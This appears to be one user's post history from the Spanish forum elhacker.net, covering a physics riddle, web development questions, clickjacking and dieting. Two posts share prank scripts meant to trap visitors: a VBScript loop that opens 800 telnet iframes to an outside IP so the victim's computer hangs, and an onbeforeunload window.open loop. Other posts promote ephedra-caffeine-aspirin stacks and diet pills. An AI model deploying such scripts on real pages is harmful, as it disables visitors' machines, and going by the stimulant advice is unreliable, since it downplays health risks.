elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
1  Programación / Desarrollo Web / Lightbox fuera de iframe en: 8 Mayo 2013, 05:50 am
Buenas foreros, tengo una duda, tengo un contenido dentro de un iframe, en este contenido existe un script para sacar un lightbox pero al momento de funcionar solo abarca el espacio del iframe, es posible que el lightbox abarque la pantalla completa, es decir fuera del iframe?
Saludos.
2  Foros Generales / Foro Libre / Re: Que pesa mas, 1kg de... en: 22 Mayo 2012, 21:01 pm
decime porque esta errada mi respuesta y despues hablamos.

Yo no dije que tu respuesta estaba equivocada, pero el tema no se trata  del acertijo original, hablo de la modificación del mismo.

La definicion de kilogramo se divide en:
Kilogramo-masa
Kilogramo-fuerza

Al tener el kilogramo-masa un patron establecido (aleacion de platino e iridio) entonces se debe respetar esa medida, si tu llevas es patron a jupiter sera mas pesado (newtons) que aqui.

3  Foros Generales / Foro Libre / Re: Que pesa mas, 1kg de... en: 22 Mayo 2012, 17:49 pm
esto es mas viejo, es realidad el original es "que pesa mas un kilo de plumas, o un kilo de plomo.", obviamente los 2 al ser 1kg pesan iguales, no importa el contenido, los 2 son 1kg.


no leiste todo el post, verdad?
4  Foros Generales / Foro Libre / Re: Que pesa mas, 1kg de... en: 22 Mayo 2012, 12:32 pm
Los que dijeron que pesaba mas en jupiter piensan igual que yo, pero mis amigos dicen como maxim:


 
Depende....
Si pesas aqui 1 kg de algodón y 1kg de plomo ... y ese 1kg de plomo lo mandas a jupiter, si que va a pesar mas por la gravedad....
ahora.... si el plomo lo coges y lo pesas en jupiter va a pesar lo mismo 1kg -1kg , pero si lo traes a la tierra pesara mas el algodon por que igual aqui ese mismo plomo pesa 100 gr. al ser menor la gravedad


Por lo que me puse a buscar la manera de hacer correcto mi pensamiento, analizando el significado de kilogramo, menciona que "Es la única unidad básica que emplea un prefijo, y la única unidad del SI que todavía se define por un objeto patrón y no por una característica física fundamental."



Al existir un patron entonces yo puedo llevarme este kg a jupiter e indefinidamente pesara mas allá, por lo tanto se debe respetar el valor del kg que tiene aqui en la tierra, no?



CORAX TE AMOOOOO!
Diste con el clavo!
5  Foros Generales / Foro Libre / Que pesa mas, 1kg de... en: 22 Mayo 2012, 05:47 am
Buenas foreros.
Les vengo con una pregunta algo revuelta, derivada de la pregunta que imagino a muchos les hicieron algun dia:
Que pesa mas, 1kg de algodon o 1kg de plomo?

Entonces yo de odioso modifique la pregunta por esta:

Que pesa mas, 1kg de algodon en la tierra o 1kg de plomo en jupiter?

PORFAVOR LEAN BIEN LA PREGUNTA Y NO RESPONDAN SOLO POR RESPONDER.

6  Foros Generales / Foro Libre / Re: Dieta Dukan en: 18 Mayo 2012, 23:07 pm
Busque sobre las pastillas isoprox pero solo encontre proteina con ese nombre.
Pero suplementos que hagan reducir areas especificas no existen, tu genetica decide por donde empezara a comer grasa y en que proporcion.

Los termogenicos basicos son los que incluyen te verde, los medios meten ademas otras plantas que igual aceleran el metabolismo o reducen el apetito o traen estimulantes como la cafeina.
Ñas mejorcitas y mas fuertes hacen el triangulo ECA.
Efedra, Cafeina, Aspirina.
Este conjuntito si ayuda bastante con aumentar la energia, reducir el apetito y en general para facilitar la perdida de grasa.
Ojo: Efedra no es lo mismo que efedrina, hahaha.

Pero eso si, antes de usar termogenicos hay que seguir bien la dieta y el ejercicio aerobico.

Mi experiencia con unas pastillas que se manejan aca en mexico llamadas "methyldrene" sumado a una dieta de 1400 calorias y 30 minutos diario de cardio fue que baje 6kg en 2 semanas, claro que fueron mis primeros 6kg (Son los mas sencillos de perder) .

Saludos
7  Foros Generales / Foro Libre / Re: Dieta Dukan en: 15 Mayo 2012, 02:46 am
La solucion es bien simple.
Tienes que consumir menos calorias de las que tu cuerpo gasta para que utilice tu grasa como combustible.

Ahora, como sabes esta cantidad de calorias, busca en internet la formula para obtener el metabolismo basal, ya con esto analiza todo lo que consumes, calorias y tu misma preparate una dieta respetando los porcentajes de macronutrientes.  50% proteinas 30 % carbohidratos  20% grasas
(una aproximación)


Si a esto le sumas un suplemento para acelerar tu metabolismo es imposible no adelgazar.

Uno de los tips es repartir lo que comes en 5 comidas al dia para mantener tu metabolismo siempre activo.
8  Programación / Desarrollo Web / Re: javascript Unclosable Window en: 23 Abril 2012, 07:17 am
Buen dia amigo, esos trucos que pueden ser realizados con javascript ya son antiguos y tienen la capacidad de cerrarse con el Administrador de Tareas, no hace mucho descubrí un método para burlar cualquier método de cerrado y que cuelga el computador instantáneamente.

Se trata de generar ventanas DOS utilizando VBScript, lo que esto hace es generar muchas ventanas DOS que dejará el computador inutilizable y la única opción de la victima será reiniciar el equipo.

Podemos utilizar algo como lo siguiente:

Código:
<script type="text/vbscript">  
for a=1 to 800  
document.write("<iframe src=" + chr(34) + "telnet://68.178.254.21:21" + chr(34) + ">")  
next  
</script>


interesante, gracias brother.
Viendo lo de mi codigo, me doy cuenta que la parte que falla es en el window.open, chrome y firefox lo toman como popup y no reabren la ventana.

Bueno sin más que decir, te dejo el link de mi artículo para que implementes el script completo: Jugando con ventanas DOS desde un sitio web y contigo.

Saludos.
9  Programación / Desarrollo Web / javascript Unclosable Window en: 20 Abril 2012, 20:57 pm
Buenas Foreros!
Ando de bromista y busco un codigo para una ventana "incerrable", el script funciona bien en firefox pero con chrome no anda :(
casi seguro que es por el window.open, existe alguna alternativa a esta funcion para volver a abrir una ventana?
Código:
<HTML>
<head>
<script>
function closeIt()
{
window.open(self.location);
}
window.onbeforeunload = closeIt;
</script>
</head>
<body>
</body>
</html>

Saludos!
10  Programación / Desarrollo Web / Re: Facebook dentro de un frame. en: 20 Abril 2012, 18:24 pm
Both Google and Facebook make use of the X-Frame-Options HTTP response header in order to prevent their sites from being framed by a site on another domain.

X-Frame-options is only recognized by "newer" browsers. But don't get excited just yet, there are way to prevent frame in those browsers as well. Jeff Atwood (co-founder of Stack Overflow and the Stack Exchange network) has talks about frame busting on his blog.

The reason websites need to prevent framing is that iframes (and frames) allow for a malicious attack known as clickjacking. Clickjacking is:

    a malicious technique of tricking a Web user into clicking on something different to what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines